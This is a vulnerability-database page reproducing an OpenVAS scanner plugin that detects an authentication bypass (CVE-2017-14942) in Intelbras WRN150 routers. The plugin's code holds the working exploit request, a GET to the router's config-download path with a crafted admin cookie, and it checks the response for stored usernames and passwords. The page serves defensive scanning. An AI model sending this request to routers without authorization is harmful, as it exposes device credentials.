Lucene search
+L

Intelbras Roteador Wireless N WRN Device Authentication Bypass Vulnerability - Active Check

🗓️ 06 Oct 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 107 Views

Intelbras Roteador Wireless N WRN Device Authentication Bypass Vulnerability. Insufficient access control allows attackers to bypass admin authentication via cookie and gain access to sensitive data. Affected: Intelbras Roteador Wireless WRN150 with firmware version 1.0.1. Upgrade to the latest firmware available from the vendor

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2017-14942
1 Jan 202112:32
circl
cnvd
CNVD
Intelbras WRN 150 Security Bypass Vulnerability
11 Oct 201700:00
cnvd
cve
CVE
CVE-2017-14942
29 Sep 201719:00
cve
cvelist
Cvelist
CVE-2017-14942
29 Sep 201719:00
cvelist
euvd
EUVD
EUVD-2017-6419
7 Oct 202500:30
euvd
nuclei
Nuclei
Intelbras WRN 150 - Authentication Bypass
30 Aug 202605:46
nuclei
nvd
NVD
CVE-2017-14942
30 Sep 201701:29
nvd
osv
OSV
CVE-2017-14942
30 Sep 201701:29
osv
prion
Prion
Authentication flaw
30 Sep 201701:29
prion
prion
Prion
Design/Logic Flaw
1 Jan 202107:15
prion
Rows per page
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:intelbras_roteador:wireless-n_wrn";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.812015");
  script_version("2025-03-26T05:38:58+0000");
  script_cve_id("CVE-2017-14942");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2025-03-26 05:38:58 +0000 (Wed, 26 Mar 2025)");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2019-10-03 00:03:00 +0000 (Thu, 03 Oct 2019)");
  script_tag(name:"creation_date", value:"2017-10-06 20:36:50 +0530 (Fri, 06 Oct 2017)");
  script_tag(name:"qod_type", value:"exploit");
  script_name("Intelbras Roteador Wireless N WRN Device Authentication Bypass Vulnerability - Active Check");

  script_tag(name:"summary", value:"Intelbras Roteador Wireless N WRN devices are prone to an
  authentication bypass vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check whether it is able to get specific information or not.");

  script_tag(name:"insight", value:"The flaw exists due to an insufficient
  access control and any attacker could bypass the admin authentication just
  by tweaking the cookie.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to bypass authentication mechanism and gain access to sensitive data.");

  script_tag(name:"affected", value:"Intelbras Roteador Wireless WRN150 devices with firmware
  version 1.0.1 are known to be affected. Other models and other firmware versions may also be
  affected.");

  script_tag(name:"solution", value:"Update to the latest firmware available
  from the vendor.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/42916");
  script_xref(name:"URL", value:"http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2017 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_intelbras_roteador_wireless_n_wrn_devices_detect.nasl");
  script_mandatory_keys("intelbras/roteador/N-WRN/detected");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!get_app_location(port:port, cpe:CPE, nofork:TRUE))
  exit(0);

# nb: Thiw was tested on a live N-WRN 300 which is also vulnerable so no checking for model
# here
url = "/cgi-bin/DownloadCfg/RouterCfm.cfg";

req = http_get_req(port:port, url:url, add_headers:make_array("Cookie", "admin:language=pt"));
res = http_keepalive_send_recv(port:port, data:req);

if(res =~ "^HTTP/1\.[01] 200" && "wps_device_name=INTELBRAS Wireless" >< res &&
   "lan_gateway=" >< res && "http_username=" >< res && "http_passwd=" >< res &&
   "wps_device_pin=" >< res && "wl_version=" >< res) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 27.5
CVSS 39.8
EPSS0.2684
107